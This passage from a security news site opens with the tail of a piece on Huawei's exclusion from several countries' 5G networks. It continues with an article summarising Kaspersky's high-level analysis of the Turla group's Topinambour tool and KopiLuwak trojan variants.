The Chinese firm has already been excluded by several countries from building their 5G networks: the United States, Australia, New Zealand, and Japan announced the exclusion of Huawei technology from their 5G networks.


The United States was the first to highlight the risks to national security posed by the adoption of Huawei equipment, and it is inviting internet providers and telco operators in allied countries to ban the company.

Anyway, some countries in Europe, such as Germany and the UK, decided not to exclude Huawei from building their national 5G networks.

Europeans are divided on the issue, with Germany having in principle accepted Huawei’s participation in the construction of its 5G network.

Pierluigi Paganini

(SecurityAffairs – Huawei, cyberespionage)


Turla APT group adds Topinambour Trojan to its arsenal

Kaspersky researchers revealed that since earlier this year, Russia-linked APT group Turla used new variants of the KopiLuwak Trojan in targeted attacks.

Security experts at Kaspersky revealed that the Russia-linked APT group Turla used new variants of the KopiLuwak Trojan in targeted attacks since early 2019.

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007, targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America and former Soviet bloc nations.

The list of previously known victims is long and also includes the Swiss defense firm RUAG, the US Department of State, and the US Central Command.

In the past months, security experts reported the APT group has been updating its arsenal. In May, ESET experts revealed that Turla has been using a sophisticated backdoor, dubbed LightNeuron, to hijack Microsoft Exchange mail servers.

Now Kaspersky published a detailed analysis of a new modular tool dubbed Topinambour (aka Sunchoke – the Jerusalem artichoke). Kaspersky researchers also found .NET and PowerShell versions of the KopiLuwak Trojan that was involved in targeted attacks since the beginning of this year. 

Topinambour is spread via tainted legitimate software installers; the dropper includes a tiny .NET shell that is used to deliver commands to the target machine and to fetch other modules via SMB.

“Using this and SMB shares on rented virtual private servers (VPS), the campaign operators spread the next-stage modules using just “net use” and “copy” Windows shell commands. It’s hard to believe, but SMB still works through public networks.” reads the analysis published by Kaspersky.

“These campaign-related VPSs are located in South Africa. Interestingly, their external IP addresses start with “197.168”. Possibly these first two bytes are there to mimic LAN addresses that start with “192.168”.”

The dropper sample analyzed by the experts is able to deliver the payload to a specific location, gain persistence for the malicious code with a scheduled task that starts every 30 minutes, and drop the original application the dropper tries to mimic. 

The tiny .NET shell dropped on the target system connects to the C2 server and fetches the KopiLuwak dropper, which gains persistence and drops a JavaScript file that leads to the final-stage Trojan.

Recent operations also involved another .NET Trojan, called RocketMan, alongside the KopiLuwak JavaScript; it supports commands to download/upload a file and to halt the Trojan’s activity.

The hackers also used a PowerShell Trojan tracked as MiamiBeach, which differs from RocketMan in its ability to take screenshots.

“The reason behind the development of KopiLuwak’s PowerShell and .NET analogues may be simply to minimize detection of the well-known, publicly discussed JavaScript versions.” concludes Kaspersky.

“Using the Windows system registry to store encrypted data that is later used by the malware also seems to be aimed at minimizing detection and reducing the digital footprint on any victim’s computer, where only a tiny starter would be left,”

Pierluigi Paganini

(SecurityAffairs – Turla APT, Topinambour)
